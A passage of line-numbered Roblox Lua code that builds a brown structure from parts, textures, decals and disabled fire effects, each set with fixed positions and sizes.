  760. ["Color"] = Color3.new(0.411765, 0.25098, 0.156863),
  761. })
  762. o91 = Create("Part",{
  763. ["Name"] = "trunk",
  764. ["Parent"] = o5,
  765. ["BrickColor"] = BrickColor.new("Dark orange"),
  766. ["Position"] = Vector3.new(-17.900116, 172.190109, 144.799652),
  767. ["Rotation"] = Vector3.new(-0, 90, 0),
  768. ["Anchored"] = true,
  769. ["CFrame"] = CFrame.new(-17.900116, 172.190109, 144.799652, -0, 0, 1, -0, 1, 0, -1, 0, 0),
  770. ["Size"] = Vector3.new(1, 1.20000005, 2),
  771. ["Color"] = Color3.new(0.627451, 0.372549, 0.207843),
  772. })
  773. o92 = Create("Texture",{
  774. ["Name"] = "top",
  775. ["Parent"] = o91,
  776. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  777. ["Face"] = Enum.NormalId.Top,
  778. ["StudsPerTileU"] = 4,
  779. ["StudsPerTileV"] = 4,
  780. })
  781. o93 = Create("Texture",{
  782. ["Name"] = "back",
  783. ["Parent"] = o91,
  784. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  785. ["Face"] = Enum.NormalId.Back,
  786. ["StudsPerTileU"] = 4,
  787. ["StudsPerTileV"] = 4,
  788. })
  789. o94 = Create("Texture",{
  790. ["Name"] = "left",
  791. ["Parent"] = o91,
  792. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  793. ["Face"] = Enum.NormalId.Left,
  794. ["StudsPerTileU"] = 4,
  795. ["StudsPerTileV"] = 4,
  796. })
  797. o95 = Create("Texture",{
  798. ["Name"] = "right",
  799. ["Parent"] = o91,
  800. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  801. ["Face"] = Enum.NormalId.Right,
  802. ["StudsPerTileU"] = 4,
  803. ["StudsPerTileV"] = 4,
  804. })
  805. o96 = Create("Texture",{
  806. ["Name"] = "bottom",
  807. ["Parent"] = o91,
  808. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  809. ["Face"] = Enum.NormalId.Bottom,
  810. ["StudsPerTileU"] = 4,
  811. ["StudsPerTileV"] = 4,
  812. })
  813. o97 = Create("Decal",{
  814. ["Parent"] = o91,
  815. ["Texture"] = "http://www.roblox.com/asset/?id=8162665",
  816. })
  817. o98 = Create("Part",{
  818. ["Name"] = "trunk",
  819. ["Parent"] = o5,
  820. ["BrickColor"] = BrickColor.new("Dark orange"),
  821. ["Position"] = Vector3.new(-56.9001389, 156.790146, 147.299652),
  822. ["Anchored"] = true,
  823. ["CFrame"] = CFrame.new(-56.9001389, 156.790146, 147.299652, 1, 0, 0, 0, 1, 0, 0, 0, 1),
  824. ["Size"] = Vector3.new(2, 2.4000001, 2),
  825. ["Color"] = Color3.new(0.627451, 0.372549, 0.207843),
  826. })
  827. o99 = Create("Texture",{
  828. ["Name"] = "top",
  829. ["Parent"] = o98,
  830. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  831. ["Face"] = Enum.NormalId.Top,
  832. ["StudsPerTileU"] = 4,
  833. ["StudsPerTileV"] = 4,
  834. })
  835. o100 = Create("Texture",{
  836. ["Name"] = "back",
  837. ["Parent"] = o98,
  838. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  839. ["Face"] = Enum.NormalId.Back,
  840. ["StudsPerTileU"] = 4,
  841. ["StudsPerTileV"] = 4,
  842. })
  843. o101 = Create("Texture",{
  844. ["Name"] = "left",
  845. ["Parent"] = o98,
  846. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  847. ["Face"] = Enum.NormalId.Left,
  848. ["StudsPerTileU"] = 4,
  849. ["StudsPerTileV"] = 4,
  850. })
  851. o102 = Create("Texture",{
  852. ["Name"] = "right",
  853. ["Parent"] = o98,
  854. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  855. ["Face"] = Enum.NormalId.Right,
  856. ["StudsPerTileU"] = 4,
  857. ["StudsPerTileV"] = 4,
  858. })
  859. o103 = Create("Texture",{
  860. ["Name"] = "bottom",
  861. ["Parent"] = o98,
  862. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  863. ["Face"] = Enum.NormalId.Bottom,
  864. ["StudsPerTileU"] = 4,
  865. ["StudsPerTileV"] = 4,
  866. })
  867. o104 = Create("Texture",{
  868. ["Name"] = "right",
  869. ["Parent"] = o98,
  870. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  871. ["StudsPerTileU"] = 4,
  872. ["StudsPerTileV"] = 4,
  873. })
  874. o105 = Create("Part",{
  875. ["Name"] = "trunk",
  876. ["Parent"] = o5,
  877. ["Material"] = Enum.Material.CorrodedMetal,
  878. ["BrickColor"] = BrickColor.new("Dark orange"),
  879. ["Position"] = Vector3.new(-37.4001999, 164.990082, 147.299652),
  880. ["Anchored"] = true,
  881. ["CFrame"] = CFrame.new(-37.4001999, 164.990082, 147.299652, 1, 0, 0, 0, 1, 0, 0, 0, 1),
  882. ["Size"] = Vector3.new(41, 13.2000008, 2),
  883. ["Color"] = Color3.new(0.627451, 0.372549, 0.207843),
  884. })
  885. o106 = Create("Texture",{
  886. ["Name"] = "top",
  887. ["Parent"] = o105,
  888. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  889. ["Face"] = Enum.NormalId.Top,
  890. ["StudsPerTileU"] = 4,
  891. ["StudsPerTileV"] = 4,
  892. })
  893. o107 = Create("Texture",{
  894. ["Name"] = "back",
  895. ["Parent"] = o105,
  896. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  897. ["Face"] = Enum.NormalId.Back,
  898. ["StudsPerTileU"] = 4,
  899. ["StudsPerTileV"] = 4,
  900. })
  901. o108 = Create("Texture",{
  902. ["Name"] = "left",
  903. ["Parent"] = o105,
  904. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  905. ["Face"] = Enum.NormalId.Left,
  906. ["StudsPerTileU"] = 4,
  907. ["StudsPerTileV"] = 4,
  908. })
  909. o109 = Create("Texture",{
  910. ["Name"] = "right",
  911. ["Parent"] = o105,
  912. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  913. ["Face"] = Enum.NormalId.Right,
  914. ["StudsPerTileU"] = 4,
  915. ["StudsPerTileV"] = 4,
  916. })
  917. o110 = Create("Texture",{
  918. ["Name"] = "bottom",
  919. ["Parent"] = o105,
  920. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  921. ["Face"] = Enum.NormalId.Bottom,
  922. ["StudsPerTileU"] = 4,
  923. ["StudsPerTileV"] = 4,
  924. })
  925. o111 = Create("Decal",{
  926. ["Parent"] = o105,
  927. ["Texture"] = "http://www.roblox.com/asset/?id=32818559",
  928. })
  929. o112 = Create("Decal",{
  930. ["Parent"] = o105,
  931. ["Texture"] = "http://www.roblox.com/asset/?id=48814593",
  932. })
  933. o113 = Create("Fire",{
  934. ["Parent"] = o105,
  935. ["Size"] = 30,
  936. ["Color"] = Color3.new(1, 0.788235, 0),
  937. ["Enabled"] = false,
  938. ["Heat"] = 25,
  939. ["SecondaryColor"] = Color3.new(1, 0, 0),
  940. })
  941. o114 = Create("Part",{
  942. ["Name"] = "trunk",
  943. ["Parent"] = o5,
  944. ["BrickColor"] = BrickColor.new("Dark orange"),
  945. ["Position"] = Vector3.new(-17.900116, 174.590088, 127.299652),
  946. ["Rotation"] = Vector3.new(-0, 90, 0),
  947. ["Anchored"] = true,
  948. ["CFrame"] = CFrame.new(-17.900116, 174.590088, 127.299652, -0, 0, 1, -0, 1, 0, -1, 0, 0),
  949. ["Size"] = Vector3.new(28, 6, 2),
  950. ["Color"] = Color3.new(0.627451, 0.372549, 0.207843),
  951. })
  952. o115 = Create("Texture",{
  953. ["Name"] = "top",
  954. ["Parent"] = o114,
  955. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  956. ["Face"] = Enum.NormalId.Top,
  957. ["StudsPerTileU"] = 4,
  958. ["StudsPerTileV"] = 4,
  959. })
  960. o116 = Create("Texture",{
  961. ["Name"] = "back",
  962. ["Parent"] = o114,
  963. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  964. ["Face"] = Enum.NormalId.Back,
  965. ["StudsPerTileU"] = 4,
  966. ["StudsPerTileV"] = 4,
  967. })
  968. o117 = Create("Texture",{
  969. ["Name"] = "left",
  970. ["Parent"] = o114,
  971. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  972. ["Face"] = Enum.NormalId.Left,
  973. ["StudsPerTileU"] = 4,
  974. ["StudsPerTileV"] = 4,
  975. })
  976. o118 = Create("Texture",{
  977. ["Name"] = "right",
  978. ["Parent"] = o114,
  979. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  980. ["Face"] = Enum.NormalId.Right,
  981. ["StudsPerTileU"] = 4,
  982. ["StudsPerTileV"] = 4,
  983. })
  984. o119 = Create("Texture",{
  985. ["Name"] = "bottom",
  986. ["Parent"] = o114,
  987. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  988. ["Face"] = Enum.NormalId.Bottom,
  989. ["StudsPerTileU"] = 4,
  990. ["StudsPerTileV"] = 4,
  991. })
  992. o120 = Create("Decal",{
  993. ["Parent"] = o114,
  994. ["Texture"] = "http://www.roblox.com/asset/?id=8162665",
  995. })
  996. o121 = Create("Part",{
  997. ["Name"] = "trunk",
  998. ["Parent"] = o5,
  999. ["BrickColor"] = BrickColor.new("Dark orange"),
  1000. ["Position"] = Vector3.new(-56.9001389, 174.590088, 127.299652),
  1001. ["Rotation"] = Vector3.new(-0, -90, 0),
  1002. ["Anchored"] = true,
  1003. ["CFrame"] = CFrame.new(-56.9001389, 174.590088, 127.299652, 0, 0, -1, 0, 1, -0, 1, 0, -0),
  1004. ["Size"] = Vector3.new(28, 6, 2),
  1005. ["Color"] = Color3.new(0.627451, 0.372549, 0.207843),
  1006. })
  1007. o122 = Create("Texture",{
  1008. ["Name"] = "top",
  1009. ["Parent"] = o121,
  1010. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1011. ["Face"] = Enum.NormalId.Top,
  1012. ["StudsPerTileU"] = 4,
  1013. ["StudsPerTileV"] = 4,
  1014. })
  1015. o123 = Create("Texture",{
  1016. ["Name"] = "back",
  1017. ["Parent"] = o121,
  1018. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1019. ["Face"] = Enum.NormalId.Back,
  1020. ["StudsPerTileU"] = 4,
  1021. ["StudsPerTileV"] = 4,
  1022. })
  1023. o124 = Create("Texture",{
  1024. ["Name"] = "left",
  1025. ["Parent"] = o121,
  1026. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1027. ["Face"] = Enum.NormalId.Left,
  1028. ["StudsPerTileU"] = 4,
  1029. ["StudsPerTileV"] = 4,
  1030. })
  1031. o125 = Create("Texture",{
  1032. ["Name"] = "right",
  1033. ["Parent"] = o121,
  1034. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1035. ["Face"] = Enum.NormalId.Right,
  1036. ["StudsPerTileU"] = 4,
  1037. ["StudsPerTileV"] = 4,
  1038. })
  1039. o126 = Create("Texture",{
  1040. ["Name"] = "bottom",
  1041. ["Parent"] = o121,
  1042. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1043. ["Face"] = Enum.NormalId.Bottom,
  1044. ["StudsPerTileU"] = 4,
  1045. ["StudsPerTileV"] = 4,
  1046. })
  1047. o127 = Create("Decal",{
  1048. ["Parent"] = o121,
  1049. ["Texture"] = "http://www.roblox.com/asset/?id=8162665",
  1050. })
  1051. o128 = Create("Part",{
  1052. ["Parent"] = o5,
  1053. ["Material"] = Enum.Material.Wood,
  1054. ["BrickColor"] = BrickColor.new("Reddish brown"),
  1055. ["Position"] = Vector3.new(-54.9001389, 173.190109, 126.299652),
  1056. ["Anchored"] = true,
  1057. ["CFrame"] = CFrame.new(-54.9001389, 173.190109, 126.299652, 1, 0, 0, 0, 1, 0, 0, 0, 1),
  1058. ["FormFactor"] = Enum.FormFactor.Plate,
  1059. ["Size"] = Vector3.new(2, 0.400000006, 20),
  1060. ["BottomSurface"] = Enum.SurfaceType.Smooth,
  1061. ["TopSurface"] = Enum.SurfaceType.Smooth,
  1062. ["Color"] = Color3.new(0.411765, 0.25098, 0.156863),
  1063. })
  1064. o129 = Create("Part",{
  1065. ["Parent"] = o5,
  1066. ["Material"] = Enum.Material.Wood,
  1067. ["BrickColor"] = BrickColor.new("Reddish brown"),
  1068. ["Position"] = Vector3.new(-27.9001083, 173.190109, 126.299652),
  1069. ["Anchored"] = true,
  1070. ["CFrame"] = CFrame.new(-27.9001083, 173.190109, 126.299652, 1, 0, 0, 0, 1, 0, 0, 0, 1),
  1071. ["FormFactor"] = Enum.FormFactor.Plate,
  1072. ["Size"] = Vector3.new(2, 0.400000006, 20),
  1073. ["BottomSurface"] = Enum.SurfaceType.Smooth,
  1074. ["TopSurface"] = Enum.SurfaceType.Smooth,
  1075. ["Color"] = Color3.new(0.411765, 0.25098, 0.156863),
  1076. })
  1077. o130 = Create("Part",{
  1078. ["Name"] = "trunk",
  1079. ["Parent"] = o5,
  1080. ["Material"] = Enum.Material.CorrodedMetal,
  1081. ["BrickColor"] = BrickColor.new("Dark orange"),
  1082. ["Position"] = Vector3.new(-56.9001389, 164.990082, 126.299652),
  1083. ["Rotation"] = Vector3.new(-0, -90, 0),
  1084. ["Anchored"] = true,
  1085. ["CFrame"] = CFrame.new(-56.9001389, 164.990082, 126.299652, 0, 0, -1, 0, 1, -0, 1, 0, -0),
  1086. ["Size"] = Vector3.new(40, 13.2000008, 2),
  1087. ["Color"] = Color3.new(0.627451, 0.372549, 0.207843),
  1088. })
  1089. o131 = Create("Texture",{
  1090. ["Name"] = "top",
  1091. ["Parent"] = o130,
  1092. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1093. ["Face"] = Enum.NormalId.Top,
  1094. ["StudsPerTileU"] = 4,
  1095. ["StudsPerTileV"] = 4,
  1096. })
  1097. o132 = Create("Texture",{
  1098. ["Name"] = "back",
  1099. ["Parent"] = o130,
  1100. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1101. ["Face"] = Enum.NormalId.Back,
  1102. ["StudsPerTileU"] = 4,
  1103. ["StudsPerTileV"] = 4,
  1104. })
  1105. o133 = Create("Texture",{
  1106. ["Name"] = "left",
  1107. ["Parent"] = o130,
  1108. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1109. ["Face"] = Enum.NormalId.Left,
  1110. ["StudsPerTileU"] = 4,
  1111. ["StudsPerTileV"] = 4,
  1112. })
  1113. o134 = Create("Texture",{
  1114. ["Name"] = "right",
  1115. ["Parent"] = o130,
  1116. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1117. ["Face"] = Enum.NormalId.Right,
  1118. ["StudsPerTileU"] = 4,
  1119. ["StudsPerTileV"] = 4,
  1120. })
  1121. o135 = Create("Texture",{
  1122. ["Name"] = "bottom",
  1123. ["Parent"] = o130,
  1124. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1125. ["Face"] = Enum.NormalId.Bottom,
  1126. ["StudsPerTileU"] = 4,
  1127. ["StudsPerTileV"] = 4,
  1128. })
  1129. o136 = Create("Decal",{
  1130. ["Parent"] = o130,
  1131. ["Texture"] = "http://www.roblox.com/asset/?id=32818559",
  1132. })
  1133. o137 = Create("Decal",{
  1134. ["Parent"] = o130,
  1135. ["Texture"] = "http://www.roblox.com/asset/?id=48814603",
  1136. })
  1137. o138 = Create("Fire",{
  1138. ["Parent"] = o130,
  1139. ["Size"] = 30,
  1140. ["Color"] = Color3.new(1, 0.788235, 0),
  1141. ["Enabled"] = false,
  1142. ["Heat"] = 25,
  1143. ["SecondaryColor"] = Color3.new(1, 0, 0),
  1144. })
  1145. o139 = Create("Part",{
  1146. ["Name"] = "trunk",
  1147. ["Parent"] = o5,
  1148. ["BrickColor"] = BrickColor.new("Dark orange"),
  1149. ["Position"] = Vector3.new(-17.900116, 169.790146, 127.299652),
  1150. ["Rotation"] = Vector3.new(-0, 90, 0),
  1151. ["Anchored"] = true,
  1152. ["CFrame"] = CFrame.new(-17.900116, 169.790146, 127.299652, -0, 0, 1, -0, 1, 0, -1, 0, 0),
  1153. ["Size"] = Vector3.new(8, 3.60000014, 2),
  1154. ["Color"] = Color3.new(0.627451, 0.372549, 0.207843),
  1155. })
  1156. o140 = Create("Texture",{
  1157. ["Name"] = "top",
  1158. ["Parent"] = o139,
  1159. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1160. ["Face"] = Enum.NormalId.Top,
  1161. ["StudsPerTileU"] = 4,
  1162. ["StudsPerTileV"] = 4,
  1163. })
  1164. o141 = Create("Texture",{
  1165. ["Name"] = "back",
  1166. ["Parent"] = o139,
  1167. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1168. ["Face"] = Enum.NormalId.Back,
  1169. ["StudsPerTileU"] = 4,
  1170. ["StudsPerTileV"] = 4,
  1171. })
  1172. o142 = Create("Texture",{
  1173. ["Name"] = "left",
  1174. ["Parent"] = o139,
  1175. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1176. ["Face"] = Enum.NormalId.Left,
  1177. ["StudsPerTileU"] = 4,
  1178. ["StudsPerTileV"] = 4,
  1179. })
  1180. o143 = Create("Texture",{
  1181. ["Name"] = "right",
  1182. ["Parent"] = o139,
  1183. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1184. ["Face"] = Enum.NormalId.Right,
  1185. ["StudsPerTileU"] = 4,
  1186. ["StudsPerTileV"] = 4,
  1187. })
  1188. o144 = Create("Texture",{
  1189. ["Name"] = "bottom",
  1190. ["Parent"] = o139,
  1191. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1192. ["Face"] = Enum.NormalId.Bottom,
  1193. ["StudsPerTileU"] = 4,
  1194. ["StudsPerTileV"] = 4,
  1195. })
  1196. o145 = Create("Decal",{
  1197. ["Parent"] = o139,
  1198. ["Texture"] = "http://www.roblox.com/asset/?id=8162665",
  1199. })
  1200. o146 = Create("Part",{
  1201. ["Name"] = "trunk",
  1202. ["Parent"] = o5,
  1203. ["BrickColor"] = BrickColor.new("Dark orange"),
  1204. ["Position"] = Vector3.new(-37.4001999, 178.190109, 128.299652),
  1205. ["Anchored"] = true,
  1206. ["CFrame"] = CFrame.new(-37.4001999, 178.190109, 128.299652, 1, 0, 0, 0, 1, 0, 0, 0, 1),
  1207. ["Size"] = Vector3.new(41, 1.20000005, 28),
  1208. ["Color"] = Color3.new(0.627451, 0.372549, 0.207843),
  1209. })
  1210. o147 = Create("Texture",{
  1211. ["Name"] = "top",
  1212. ["Parent"] = o146,
  1213. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1214. ["Face"] = Enum.NormalId.Top,
  1215. ["StudsPerTileU"] = 4,
  1216. ["StudsPerTileV"] = 4,
  1217. })
  1218. o148 = Create("Texture",{
  1219. ["Name"] = "back",
  1220. ["Parent"] = o146,
  1221. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1222. ["Face"] = Enum.NormalId.Back,
  1223. ["StudsPerTileU"] = 4,
  1224. ["StudsPerTileV"] = 4,
  1225. })
  1226. o149 = Create("Texture",{
  1227. ["Name"] = "left",
  1228. ["Parent"] = o146,
  1229. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1230. ["Face"] = Enum.NormalId.Left,
  1231. ["StudsPerTileU"] = 4,
  1232. ["StudsPerTileV"] = 4,
  1233. })
  1234. o150 = Create("Texture",{
  1235. ["Name"] = "right",
  1236. ["Parent"] = o146,
  1237. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1238. ["Face"] = Enum.NormalId.Right,
  1239. ["StudsPerTileU"] = 4,
  1240. ["StudsPerTileV"] = 4,
  1241. })
  1242. o151 = Create("Texture",{
  1243. ["Name"] = "bottom",
  1244. ["Parent"] = o146,
  1245. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1246. ["Face"] = Enum.NormalId.Bottom,
  1247. ["StudsPerTileU"] = 4,
  1248. ["StudsPerTileV"] = 4,
  1249. })
  1250. o152 = Create("Texture",{
  1251. ["Name"] = "right",
  1252. ["Parent"] = o146,
  1253. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1254. ["StudsPerTileU"] = 4,
  1255. ["StudsPerTileV"] = 4,
  1256. })
  1257. o153 = Create("Part",{
  1258. ["Parent"] = o5,
  1259. ["Material"] = Enum.Material.CorrodedMetal,
  1260. ["BrickColor"] = BrickColor.new("Brown"),
  1261. ["Position"] = Vector3.new(-37.4001999, 158.190109, 127.299652),
  1262. ["Rotation"] = Vector3.new(180, -0, -180),
  1263. ["Anchored"] = true,
  1264. ["CFrame"] = CFrame.new(-37.4001999, 158.190109, 127.299652, -1, 0, -0, -0, 1, -0, -0, 0, -1),
  1265. ["FormFactor"] = Enum.FormFactor.Plate,
  1266. ["Size"] = Vector3.new(41, 0.400000006, 42),
  1267. ["BottomSurface"] = Enum.SurfaceType.Smooth,
  1268. ["TopSurface"] = Enum.SurfaceType.Smooth,
  1269. ["Color"] = Color3.new(0.486275, 0.360784, 0.27451),
  1270. })
  1271. o154 = Create("Texture",{
  1272. ["Name"] = "back",
  1273. ["Parent"] = o153,
  1274. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1275. ["StudsPerTileU"] = 4,
  1276. ["StudsPerTileV"] = 4,
  1277. })
  1278. o155 = Create("Texture",{
  1279. ["Name"] = "back",
  1280. ["Parent"] = o153,
  1281. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1282. ["Face"] = Enum.NormalId.Left,
  1283. ["StudsPerTileU"] = 4,
  1284. ["StudsPerTileV"] = 4,
  1285. })
  1286. o156 = Create("Texture",{
  1287. ["Name"] = "back",
  1288. ["Parent"] = o153,
  1289. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1290. ["Face"] = Enum.NormalId.Back,
  1291. ["StudsPerTileU"] = 4,
  1292. ["StudsPerTileV"] = 4,
  1293. })
  1294. o157 = Create("Texture",{
  1295. ["Name"] = "back",
  1296. ["Parent"] = o153,
  1297. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1298. ["Face"] = Enum.NormalId.Right,
  1299. ["StudsPerTileU"] = 4,
  1300. ["StudsPerTileV"] = 4,
  1301. })
  1302. o158 = Create("Fire",{
  1303. ["Parent"] = o153,
  1304. ["Size"] = 30,
  1305. ["Color"] = Color3.new(1, 0.788235, 0),
  1306. ["Enabled"] = false,
  1307. ["Heat"] = 25,
  1308. ["SecondaryColor"] = Color3.new(1, 0, 0),
  1309. })
  1310. o159 = Create("Part",{
  1311. ["Name"] = "trunk",
  1312. ["Parent"] = o5,
  1313. ["Material"] = Enum.Material.CorrodedMetal,
  1314. ["BrickColor"] = BrickColor.new("Dark orange"),
  1315. ["Position"] = Vector3.new(-17.900116, 164.990082, 138.799652),
  1316. ["Rotation"] = Vector3.new(-0, 90, 0),
  1317. ["Anchored"] = true,
  1318. ["CFrame"] = CFrame.new(-17.900116, 164.990082, 138.799652, -0, 0, 1, -0, 1, 0, -1, 0, 0),
  1319. ["Size"] = Vector3.new(15, 13.2000008, 2),
  1320. ["Color"] = Color3.new(0.627451, 0.372549, 0.207843),
  1321. })
  1322. o160 = Create("Texture",{
  1323. ["Name"] = "top",
  1324. ["Parent"] = o159,
  1325. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1326. ["Face"] = Enum.NormalId.Top,
  1327. ["StudsPerTileU"] = 4,
  1328. ["StudsPerTileV"] = 4,
  1329. })
  1330. o161 = Create("Texture",{
  1331. ["Name"] = "back",
  1332. ["Parent"] = o159,
  1333. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1334. ["Face"] = Enum.NormalId.Back,
  1335. ["StudsPerTileU"] = 4,
  1336. ["StudsPerTileV"] = 4,
  1337. })
  1338. o162 = Create("Texture",{
  1339. ["Name"] = "left",
  1340. ["Parent"] = o159,
  1341. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1342. ["Face"] = Enum.NormalId.Left,
  1343. ["StudsPerTileU"] = 4,
  1344. ["StudsPerTileV"] = 4,
  1345. })
  1346. o163 = Create("Texture",{
  1347. ["Name"] = "right",
  1348. ["Parent"] = o159,
  1349. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1350. ["Face"] = Enum.NormalId.Right,
  1351. ["StudsPerTileU"] = 4,
  1352. ["StudsPerTileV"] = 4,
  1353. })
  1354. o164 = Create("Texture",{
  1355. ["Name"] = "bottom",
  1356. ["Parent"] = o159,
  1357. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1358. ["Face"] = Enum.NormalId.Bottom,
  1359. ["StudsPerTileU"] = 4,
  1360. ["StudsPerTileV"] = 4,
  1361. })
  1362. o165 = Create("Decal",{
  1363. ["Parent"] = o159,
  1364. ["Texture"] = "http://www.roblox.com/asset/?id=8162665",
  1365. })
  1366. o166 = Create("Fire",{
  1367. ["Parent"] = o159,
  1368. ["Size"] = 30,
  1369. ["Color"] = Color3.new(1, 0.788235, 0),
  1370. ["Enabled"] = false,
  1371. ["Heat"] = 25,
  1372. ["SecondaryColor"] = Color3.new(1, 0, 0),
  1373. })
  1374. o167 = Create("Part",{
  1375. ["Name"] = "trunk",
  1376. ["Parent"] = o5,
  1377. ["BrickColor"] = BrickColor.new("Dark orange"),
  1378. ["Position"] = Vector3.new(-56.9001389, 173.990112, 112.799652),
  1379. ["Rotation"] = Vector3.new(-0, -90, 0),
  1380. ["Anchored"] = true,
  1381. ["CFrame"] = CFrame.new(-56.9001389, 173.990112, 112.799652, 0, 0, -1, 0, 1, -0, 1, 0, -0),
  1382. ["Size"] = Vector3.new(1, 4.80000019, 2),
  1383. ["Color"] = Color3.new(0.627451, 0.372549, 0.207843),
  1384. })
  1385. o168 = Create("Texture",{
  1386. ["Name"] = "top",
  1387. ["Parent"] = o167,
  1388. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1389. ["Face"] = Enum.NormalId.Top,
  1390. ["StudsPerTileU"] = 4,
  1391. ["StudsPerTileV"] = 4,
  1392. })
  1393. o169 = Create("Texture",{
  1394. ["Name"] = "back",
  1395. ["Parent"] = o167,
  1396. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1397. ["Face"] = Enum.NormalId.Back,
  1398. ["StudsPerTileU"] = 4,
  1399. ["StudsPerTileV"] = 4,
  1400. })
  1401. o170 = Create("Texture",{
  1402. ["Name"] = "left",
  1403. ["Parent"] = o167,
  1404. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1405. ["Face"] = Enum.NormalId.Left,
  1406. ["StudsPerTileU"] = 4,
  1407. ["StudsPerTileV"] = 4,
  1408. })
  1409. o171 = Create("Texture",{
  1410. ["Name"] = "right",
  1411. ["Parent"] = o167,
  1412. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1413. ["Face"] = Enum.NormalId.Right,
  1414. ["StudsPerTileU"] = 4,
  1415. ["StudsPerTileV"] = 4,
  1416. })
  1417. o172 = Create("Texture",{
  1418. ["Name"] = "bottom",
  1419. ["Parent"] = o167,
  1420. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1421. ["Face"] = Enum.NormalId.Bottom,
  1422. ["StudsPerTileU"] = 4,
  1423. ["StudsPerTileV"] = 4,
  1424. })
  1425. o173 = Create("Decal",{
  1426. ["Parent"] = o167,
  1427. ["Texture"] = "http://www.roblox.com/asset/?id=8162665",
  1428. })
  1429. o174 = Create("Part",{
  1430. ["Name"] = "trunk",
  1431. ["Parent"] = o5,
  1432. ["BrickColor"] = BrickColor.new("Dark orange"),
  1433. ["Position"] = Vector3.new(-56.9001389, 173.390137, 111.799652),
  1434. ["Rotation"] = Vector3.new(-0, -90, 0),
  1435. ["Anchored"] = true,
  1436. ["CFrame"] = CFrame.new(-56.9001389, 173.390137, 111.799652, 0, 0, -1, 0, 1, -0, 1, 0, -0),
  1437. ["Size"] = Vector3.new(1, 3.60000014, 2),
  1438. ["Color"] = Color3.new(0.627451, 0.372549, 0.207843),
  1439. })
  1440. o175 = Create("Texture",{
  1441. ["Name"] = "top",
  1442. ["Parent"] = o174,
  1443. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1444. ["Face"] = Enum.NormalId.Top,
  1445. ["StudsPerTileU"] = 4,
  1446. ["StudsPerTileV"] = 4,
  1447. })
  1448. o176 = Create("Texture",{
  1449. ["Name"] = "back",
  1450. ["Parent"] = o174,
  1451. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1452. ["Face"] = Enum.NormalId.Back,
  1453. ["StudsPerTileU"] = 4,
  1454. ["StudsPerTileV"] = 4,
  1455. })
  1456. o177 = Create("Texture",{
  1457. ["Name"] = "left",
  1458. ["Parent"] = o174,
  1459. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1460. ["Face"] = Enum.NormalId.Left,
  1461. ["StudsPerTileU"] = 4,
  1462. ["StudsPerTileV"] = 4,
  1463. })
  1464. o178 = Create("Texture",{
  1465. ["Name"] = "right",
  1466. ["Parent"] = o174,
  1467. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1468. ["Face"] = Enum.NormalId.Right,
  1469. ["StudsPerTileU"] = 4,
  1470. ["StudsPerTileV"] = 4,
  1471. })
  1472. o179 = Create("Texture",{
  1473. ["Name"] = "bottom",
  1474. ["Parent"] = o174,
  1475. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1476. ["Face"] = Enum.NormalId.Bottom,
  1477. ["StudsPerTileU"] = 4,
  1478. ["StudsPerTileV"] = 4,
  1479. })
  1480. o180 = Create("Decal",{
  1481. ["Parent"] = o174,
  1482. ["Texture"] = "http://www.roblox.com/asset/?id=8162665",
  1483. })
